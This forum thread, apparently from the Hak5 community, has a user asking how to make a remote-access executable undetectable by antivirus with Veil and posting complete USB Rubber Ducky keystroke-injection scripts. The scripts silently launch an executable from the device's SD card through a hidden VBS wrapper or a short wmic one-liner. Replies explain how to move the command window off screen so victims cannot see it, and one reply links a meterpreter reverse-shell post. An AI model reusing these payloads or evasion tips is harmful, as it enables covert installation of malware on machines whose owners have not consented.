Net_Spy Posted May 23, 2015 Share Posted May 23, 2015 Greetings , I would like to setup rubber ducky usb , I would appriciate if your assistance and I would like FUD my remote assitant tool exe as well any idea how to get this using veil or any other good method to FUD it with 0 detection. Thanks Regards Quote Link to comment Share on other sites More sharing options...
Rkiver Posted May 23, 2015 Share Posted May 23, 2015 In fairness you'd be more likely to find an answer at https://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/ Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted May 25, 2015 Author Share Posted May 25, 2015 well I've generate following payload with the help of gui encoder. REM Author: overwraithREM Name: RunEXE_V3.txtREM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code.REM Encoder V2.4+REM Using the run command for a broader OS base.DEFAULT_DELAY 75DELAY 3000GUI RDELAY 1000STRING cmd /Q /D /T:7F /F:OFF /V:ON /KDELAY 500ENTERDELAY 750ALT SPACESTRING MDOWNARROWREPEAT 100ENTERREM Change directories because System32 appears to be protected.STRING CD %TEMP%ENTERREM Make batch file that waits for SD card to mount.REM Delete batch file if already existsSTRING erase /Q DuckyWait.batENTERSTRING copy con DuckyWait.batENTERREM DuckyWait.batSTRING :while1ENTERSTRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do (ENTERSTRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do (ENTERSTRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" )ENTERSTRING )ENTERSTRING )ENTERSTRING if Exist %DuckyDrive% (ENTERSTRING goto :breakENTERSTRING )ENTERSTRING timeout /t 30ENTERSTRING goto :while1ENTERSTRING :breakENTERREM Continue script.STRING START %DuckyDrive%\form1.exeENTERCONTROL zENTERREM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.REM Delete vbs file if already existsSTRING erase /Q invis.vbsENTERREM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-upSTRING copy con invis.vbsENTERSTRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, FalseENTERCONTROL ZENTERREM RUN THE BATCH FILESTRING wscript.exe invis.vbs DuckyWait.batENTERSTRING EXITENTER I copied exe into sdcar root path and inject.bin as well then pluged into windows XP it shows all command on cmd screen but exe does not execute . Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted May 25, 2015 Author Share Posted May 25, 2015 Furhter more Ive did little firmware update before above , firmware duck_v2.1.hex Steps followed from here using Ubunber. https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Flashing-ducky#Flashing_the_Firmware Number written on chip 32uc3b1256 Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted May 27, 2015 Author Share Posted May 27, 2015 It does not work , Ive install twin composit firmware its worked. One more thing I would like to know is there any way that payload runs with out any popup windows. Looking forward for your kind respond. Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
Sildaekar Posted May 28, 2015 Share Posted May 28, 2015 It does not work , Ive install twin composit firmware its worked. One more thing I would like to know is there any way that payload runs with out any popup windows. Looking forward for your kind respond. Regards Net_Spy Sadly there isn't. The ducky is just a USB HID, so it is limited to only what a USB keyboard can do. Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted June 2, 2015 Author Share Posted June 2, 2015 Thanks , but I just wanted to hide those windows which opened via above mentioned script . like opening run prompt and typing command then opening cmd minimizing it etc. I only want to know is there a way to do these all silently . Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
Sildaekar Posted June 2, 2015 Share Posted June 2, 2015 You could just move the window out of view by doing the following: ALT+SPACE M DOWN DOWN DOWN ENTER Just keep in mind the above is more or less pseudocode....all this is doing is bringing up a menu, choosing "Move" and then keep hitting the down key until it's off the screen then hitting "Enter" to bring it back into focus. This was it's off the screen so no one can see it but you can still keep typing and running commands. Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted June 4, 2015 Author Share Posted June 4, 2015 Thanks @Slidaekar. Quote Link to comment Share on other sites More sharing options...
sn0wfa11 Posted June 6, 2015 Share Posted June 6, 2015 See my recent post: https://forums.hak5.org/index.php?/topic/35992-meterpreter-reverse-tcp-ducky-injection-using-powershell-and-veil/ Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted November 20, 2015 Author Share Posted November 20, 2015 Greetings , I've come across to a script that claim to be faster then script written by overwraith REM Author: overwraith REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER overwraith script working greate only taking few seconds and lots of commands .Following is the shorten scrip DELAY 3000 GUI r DELAY 100 cmd /c for /f %a in ('wmic volume get DriveLetter^, Label ^| find "DY"') do start %a\t.exe DELAY 10 ENTER I've tried it but fialed to execute it , It gives error windows can not find 'c' .Make you typed the named correctly , and then try again. Is there any way to make that above short script to run an exe from sd . Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
this-is-me Posted November 20, 2015 Share Posted November 20, 2015 Are you sure you have the ducky's drive label called DY, and a file named t.exe on the root of the SD card?The last code works fine for me. Quote Link to comment Share on other sites More sharing options...
Net_Spy Posted November 21, 2015 Author Share Posted November 21, 2015 I've renamed my drive to same and file to t.exe . Im trying it on windows 7 . Regards Net_Spy Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.